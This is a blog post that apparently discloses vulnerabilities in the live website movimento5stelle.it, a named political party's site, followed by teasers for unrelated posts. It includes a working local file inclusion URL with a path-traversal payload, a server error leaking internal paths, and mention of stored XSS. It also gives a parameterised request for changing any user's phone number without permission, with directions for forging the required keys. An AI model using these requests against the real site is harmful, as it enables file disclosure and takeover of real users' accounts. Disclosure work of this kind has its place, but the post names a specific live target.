Skip to main content

https://www.movimento5stelle.it | xss, stored xss, session theft, scripts errors, data leak, remote file inclusion, system compromise


https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi

File Inclusion
dodosmail.php is a bogus contact email script.

http://www.movimento5stelle.it/parlamento/segnalazioni.html
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file]
example:
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html

 archived page that shows the inclusion of an html page available on the server: http://archive.is/vHgOn

archived source of the movable type cgi (A bogus obsolete version used on the website): http://archive.is/20Uen
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi

 the script can be triggered to show errors and the path
Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58    


XSS
There are various xss and stored xss in the profile area.

It's possible to change the phone number even if they tried to hide it by setting the <input> as hidden (sigh).






When the xss are used there's an error, probably related to the movable type cgi.
"Can't call method &amp;quot;id&amp;quot; on an undefined value"


The phone number can be changed for any registered user without permissions.
https://www.movimento5stelle.it/php/load_cid.php?userID=[progressiveinteger related to the user]&m=[email]&key=[fakekey]&sms_key=[fakekey.dot.fakekey]&verify=1&telefono=[telephone with international prefix]

the fake key can be generated by using the keys genereted from a dummy/fake/working account.


____________________________________



Comments

Post a Comment

Popular posts from this blog

Hashes Algorithms used in different web applications

Hashes Algorithms used in different web applications. I've done this list by hand. Not all the hashes algos are correct (I've generically added md5 or ??? where is unkwnown). If you are interested send corrections and I will update it. I will publish also a better version with tabs. You can reproduce it without problems. It's part of the project mdcrack gui on sourceforge. Use the | as data separator. ----------------------------------------------------------------------------------------------------------------------------------------------------- | Title | Hash Algorithm | TablePrefix | Table Name | Website | ----------------------------------------------------------------------------------------------------------------------------------------------------- | 1C Битрикс | md5($pass) | | |http://www.1c-bitrix.ru/ | 1024cms | md5($pass) | | |http://www.1024cms.org/ | 4images | md5($pass) | | |http://ww...
Post a Comment
Read more

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)      
Post a Comment
Read more

[FIX] cyberpunk skip dialogue disappeared - pc Y button

  open C:\Games\Cyberpunk 2077\r6\config\inputUserMappings.xml with a text editor (ex. notepad++)   find   <mapping name="SceneFastForward_Button" type="Button" > ... </mapping> example (my non working settings)     <mapping name="SceneFastForward_Button" type="Button" >         <button id="IK_Pad_DigitLeft" />         <button id="IK_Y" overridableUI="fastForward" />     </mapping> and REPLACE it with the following:     <mapping name="SceneFastForward_Button" type="Button" >         <button id="IK_Pad_B_CIRCLE" />         <button id="IK_C" overridableUI="fastForward"/>     </mapping> thanks to the vanilla xml files on nexus mods as the original source.
Post a Comment
Read more